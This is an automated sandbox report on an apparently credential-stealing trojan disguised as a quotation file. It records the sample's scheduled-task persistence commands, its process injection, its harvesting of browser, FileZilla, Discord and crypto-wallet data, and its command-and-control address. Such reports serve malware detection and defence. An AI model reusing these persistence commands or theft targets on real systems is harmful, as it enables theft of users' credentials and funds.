                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\QUOTATION 061622.exe" "C:\Users\user\AppData\Roaming\Data\Data.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exeJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeQueries volume information: C:\Users\user\Desktop\QUOTATION 061622.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeQueries volume information: C:\Users\user\AppData\Roaming\Data\Data.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeQueries volume information: C:\Users\user\AppData\Roaming\Data\Data.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                        Stealing of Sensitive Information

                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 14.2.Data.exe.36a1f70.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Data.exe.393a150.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.383a150.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.3851f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.368a150.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.3851f70.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.368a150.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.36a1f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Data.exe.393a150.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.383a150.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.472524358.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.472226173.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565956315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.570961285.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565637349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.566287546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: QUOTATION 061622.exe PID: 5992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 4224, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5108, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 6324, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: QUOTATION 061622.exe, 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0m2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                        Source: QUOTATION 061622.exe, 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0m6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

                        Remote Access Functionality

                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 14.2.Data.exe.36a1f70.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Data.exe.393a150.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.383a150.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.3851f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.368a150.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.3851f70.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.368a150.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.Data.exe.36a1f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Data.exe.393a150.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION 061622.exe.383a150.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.472524358.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.472226173.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565956315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.570961285.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.565637349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.566287546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: QUOTATION 061622.exe PID: 5992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 4224, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5108, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 6324, type: MEMORYSTR
                        | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
                        |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                        | 1 Valid Accounts | 221 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 11 Masquerading | 1 OS Credential Dumping | 331 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
                        | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Access Token Manipulation | 1 Valid Accounts | LSASS Memory | 11 Process Discovery | Remote Desktop Protocol | 3 Data from Local System | Exfiltration Over Bluetooth | 11 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
                        | Domain Accounts | At (Linux) | Logon Script (Windows) | 311 Process Injection | 1 Access Token Manipulation | Security Account Manager | 241 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
                        | Local Accounts | At (Windows) | Logon Script (Mac) | 1 Scheduled Task/Job | 1 Disable or Modify Tools | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
                        | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 241 Virtualization/Sandbox Evasion | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
                        | Replication Through Removable Media | Launchd | Rc.common | Rc.common | 311 Process Injection | Cached Domain Credentials | 123 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
                        | External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Obfuscated Files or Information | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
                        Behavior Graph ID: 647019; Sample: QUOTATION 061622.exe; Startdate: 16/06/2022; Architecture: WINDOWS; Score: 100

                        Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Icon mismatch, binary includes an icon from a different legit application in order to fool users; 9 other signatures

                        • QUOTATION 061622.exe (started)
                          • Dropped: C:\Users\user\...\QUOTATION 061622.exe.log, ASCII
                          • Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
                          • vbc.exe (started)
                            • DNS/IP: api.ip.sb; 185.222.58.90, 17910, 49780, 49849 ROOTLAYERNETNL Netherlands
                            • Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Tries to steal Crypto Currency Wallets
                            • conhost.exe (started)
                          • cmd.exe (started)
                            • Dropped: C:\Users\user\AppData\Roaming\Data\Data.exe, PE32; C:\Users\user\...\Data.exe:Zone.Identifier, ASCII
                            • conhost.exe (started)
                          • cmd.exe (started)
                            • Signature: Uses schtasks.exe or at.exe to add and modify task schedules
                            • conhost.exe (started)
                            • schtasks.exe (started)
                        • Data.exe (started)
                          • Signature: Multi AV Scanner detection for dropped file
                          • vbc.exe (started)
                            • DNS/IP: api.ip.sb
                            • Signature: Tries to harvest and steal browser information (history, passwords, etc)
                            • conhost.exe (started)
                          • cmd.exe (started)
                            • conhost.exe (started)
                            • schtasks.exe (started)
                          • cmd.exe (started)
                            • conhost.exe (started)
                        • Data.exe (started)

Source | Detection | Scanner | Label
QUOTATION 061622.exe | 45% | Virustotal |
QUOTATION 061622.exe | 49% | ReversingLabs | ByteCode-MSIL.Trojan.Bulz
QUOTATION 061622.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Data\Data.exe | 49% | ReversingLabs | ByteCode-MSIL.Trojan.Bulz

Source | Detection | Scanner | Label
5.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1234943
21.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1234943
5.0.vbc.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1234943
21.0.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1234943
21.0.vbc.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1234943
21.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1234943
21.0.vbc.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1234943
5.0.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1234943
5.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1234943
5.0.vbc.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1234943
21.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1234943
5.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1234943

Source | Detection | Scanner | Label
api.ip.sb | 3% | Virustotal |

Source | Detection | Scanner | Label
http://tempuri.org/Endpoint/CheckConnectResponse | 0% | URL Reputation | safe
http://185.222.58.90:17910X | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/GetUpdates0 | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/EnvironmentSettings | 0% | URL Reputation | safe
http://tempuri.org/t_ | 0% | URL Reputation | safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe
http://tempuri.org/ | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/CheckConnect | 0% | URL Reputation | safe
http://ns.adobe.c/g | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/VerifyUpdateResponse | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/SetEnvironment | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/SetEnvironmentResponse | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/GetUpdates | 0% | URL Reputation | safe
http://185.222.58.90:179100 | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/SetEnvironmentX | 0% | Avira URL Cloud | safe
https://api.ipify.orgcookies//settinString.Removeg | 0% | URL Reputation | safe
http://185.222.58.90:17910/ | 100% | Avira URL Cloud | malware
http://185.222.58.90:17910 | 100% | Avira URL Cloud | malware
http://ns.adobe.c/gr | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/GetUpdatesResponse | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/VerifyUpdate | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/SetEnvironmentme0 | 0% | Avira URL Cloud | safe
http://tempuri.org/0 | 0% | URL Reputation | safe
https://api.ipify.orgcoo | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ip.sb | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://185.222.58.90:17910/ | true | Avira URL Cloud: malware | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
185.222.58.90 | unknown | Netherlands | 51447 | ROOTLAYERNETNL | false

Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 647019
Start date and time: 2022-06-16 14:41:16 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 58s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: QUOTATION 061622.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 35
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@25/40@4/1
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
                                                        HCA Information:
                                                        • Successful, ratio: 97%
                                                        • Number of executed functions: 146
                                                        • Number of non-executed functions: 1
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
